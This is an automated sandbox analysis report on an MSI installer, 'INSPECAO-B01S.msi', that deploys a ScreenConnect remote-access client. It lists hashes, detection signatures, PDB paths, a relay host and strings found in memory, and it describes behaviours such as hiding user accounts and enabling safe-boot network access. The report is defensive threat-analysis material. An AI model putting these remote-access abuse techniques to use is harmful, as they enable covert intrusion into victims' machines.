Windows Analysis Report
INSPECAO-B01S.msi

Overview

General Information

Sample name:	INSPECAO-B01S.msi
Analysis ID:	1543205
MD5:	a41d8aa583e034822c084a74eac45268
SHA1:	03e24d97759f550f5b261e552e7321db478c2ff6
SHA256:	7a004abae96e562926d9af1cf9e323de387923c24a0a6779d343b64537c4cc1b
Tags:	ConnectWisemsiuser-Porcupine
Infos:

Detection

ScreenConnect Tool

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Enables network access during safeboot for specific services

Modifies security policies related information

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality to launch a process as a different user

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.9% probability

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2943982681.000000001B052000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1723474974.0000000000EAD000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.000000000131B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: INSPECAO-B01S.msi, MSI15E7.tmp.1.dr, MSI1608.tmp.1.dr, MSI17AE.tmp.1.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr, 4c1433.rbs.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: INSPECAO-B01S.msi, MSIBC6.tmp.0.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940504221.0000000002142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: instance-xkznvd-relay.screenconnect.com

Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000008.00000002.2942134728.0000017F9328D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000008.00000003.1757539471.0000017F9307D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/8
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/V
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002397000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002466000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000022C6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000020CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.000000000237D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002178000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/d
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/l
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/r
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
